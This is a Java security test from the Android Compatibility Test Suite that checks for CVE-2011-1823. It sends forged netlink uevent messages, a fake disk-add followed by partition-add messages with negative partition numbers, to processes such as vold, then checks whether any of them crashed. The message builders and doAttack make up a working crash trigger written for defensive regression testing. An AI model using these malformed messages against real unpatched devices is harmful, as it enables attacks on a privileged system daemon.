/*
 * Copyright (C) 2011 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package android.security.cts;

import android.net.cts.NetlinkSocket;
import junit.framework.TestCase;

import java.io.File;
import java.io.IOException;
import java.io.UnsupportedEncodingException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashSet;
import java.util.List;
import java.util.Scanner;
import java.util.Set;

public class VoldExploitTest extends TestCase {

    /**
     * Try to crash the vold program.
     *
     * This test attempts to send an invalid netlink messages to
     * any process which is listening for the messages.  If we detect
     * that any process crashed as a result of our message, then
     * we know that we found a bug.
     *
     * If this test fails, it's due to CVE-2011-1823
     *
     * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1823
     */
    public void testTryToCrashVold() throws IOException {
        Set<Integer> pids = getPids();
        assertTrue(pids.size() > 1);  // at least vold and netd should exist

        Set<String> devices = new HashSet<String>();
        devices.addAll(getSysFsPath("/etc/vold.fstab"));
        devices.addAll(getSysFsPath("/system/etc/vold.fstab"));
        if (devices.isEmpty()) {
          // This vulnerability is not exploitable if there's
          // no entry in vold.fstab
          return;
        }

        NetlinkSocket ns = NetlinkSocket.create();
        for (int i : pids) {
            for (String j : devices) {
                doAttack(ns, i, j);
            }
        }

        // Check to see if all the processes are still alive.  If
        // any of them have died, we found an exploitable bug.
        for (int i : pids) {
            assertTrue(
                    "PID=" + i + " crashed due to a malformed netlink message."
                    + " Detected unpatched vulnerability CVE-2011-1823.",
                    new File("/proc/" + i + "/cmdline").exists());
        }
    }

    /**
     * Try to actually crash the program, by first sending a fake
     * request to add a new disk, followed by a fake request to add
     * a partition.
     */
    private static void doAttack(NetlinkSocket ns, int pid, String path)
            throws IOException {
        try {
            ns.sendmsg(pid, getDiskAddedMessage(path));
            confirmNetlinkMsgReceived();

            for (int i = -1000; i > -5000; i-=1000) {
                ns.sendmsg(pid, getPartitionAddedMessage(path, i));
                confirmNetlinkMsgReceived();
            }
        } catch (IOException e) {
            // Ignore the exception.  The process either:
            //
            // 1) Crashed
            // 2) Closed the netlink socket and refused further messages
            //
            // If #1 occurs, our PID check in testTryToCrashVold() will
            // detect the process crashed and trigger an error.
            //
            // #2 is not a security bug.  It's perfectly acceptable to
            // refuse messages from someone trying to send you
            // malicious content.
        }
    }

    /**
     * Parse the fstab.vold file, and extract out the "sysfs_path" field.
     */
    private static Set<String> getSysFsPath(String file) throws IOException {
        Set<String> retval = new HashSet<String>();
        File netlink = new File(file);
        if (!netlink.canRead()) {
            return retval;
        }
        Scanner scanner = null;
        try {
            scanner = new Scanner(netlink);
            while(scanner.hasNextLine()) {
                String line = scanner.nextLine().trim();
                if (!line.startsWith("dev_mount")) {
                    continue;
                }

                String[] fields = line.split("\\s+");
                assertTrue(fields.length >= 5);
                // Column 5 and beyond is "sysfs_path"
                retval.addAll(Arrays.asList(fields).subList(4, fields.length));
            }
        } finally {
            if (scanner != null) {
                scanner.close();
            }
        }
        return retval;
    }

    /**
     * Poll /proc/net/netlink until all the "Rmem" fields contain
     * "0".  This indicates that there are no outstanding unreceived
     * netlink messages.
     */
    private static void confirmNetlinkMsgReceived() {
        try {
            while(true) {
                boolean foundAllZeros = true;
                for (List<String> i : parseNetlink()) {
                    // Column 5 is the "Rmem" field, which is the
                    // amount of kernel memory for received netlink messages.
                    if (!i.get(4).equals("0")) {
                        foundAllZeros = false;
                    }
                }
                if (foundAllZeros) {
                    return;
                }
                Thread.sleep(50);
            }
        } catch (InterruptedException e) {
            throw new RuntimeException(e);
        }
    }

    /**
     * Extract all the PIDs listening for netlink messages.
     */
    private static Set<Integer> getPids() {
        List<List<String>> netlink = parseNetlink();
        Set<Integer> retval = new HashSet<Integer>();
        for (List<String> i : netlink) {
            // The PID is in column 3
            int pid = Integer.decode(i.get(2));
            if (new File("/proc/" + pid + "/cmdline").exists()) {
                retval.add(pid);
            }
        }
        return retval;
    }

    /**
     * Parse /proc/net/netlink and return a List of lines
     * (excluding the first line)
     */
    private static List<List<String>> parseNetlink() {
        List<List<String>> retval = new ArrayList<List<String>>();
        File netlink = new File("/proc/net/netlink");
        Scanner scanner = null;
        try {
            scanner = new Scanner(netlink);
            while(scanner.hasNextLine()) {
                String line = scanner.nextLine().trim();
                if (line.startsWith("sk")) {
                    continue;
                }

                List<String> lineList = Arrays.asList(line.split("\\s+"));
                retval.add(lineList);
            }
        } catch (IOException e) {
            throw new RuntimeException(e);
        } finally {
            if (scanner != null) {
                scanner.close();
            }
        }
        return retval;
    }

    private static byte[] getDiskAddedMessage(String path) {
        try {
            return ("@/foo\0ACTION=add\0SUBSYSTEM=block\0"
                    + "DEVPATH=" + path + "\0MAJOR=179\0MINOR=12345"
                    + "\0DEVTYPE=disk\0").getBytes("ASCII");
        } catch (UnsupportedEncodingException e) {
            throw new RuntimeException(e);
        }
    }

    private static byte[] getPartitionAddedMessage(
            String path, int partitionNum) {
        try {
            return ("@/foo\0ACTION=add\0SUBSYSTEM=block\0"
                    + "DEVPATH=" + path + "\0MAJOR=179\0MINOR=12345"
                    + "\0DEVTYPE=blah\0PARTN=" + partitionNum + "\0")
                    .getBytes("ASCII");
        } catch (UnsupportedEncodingException e) {
            throw new RuntimeException(e);
        }
    }
}
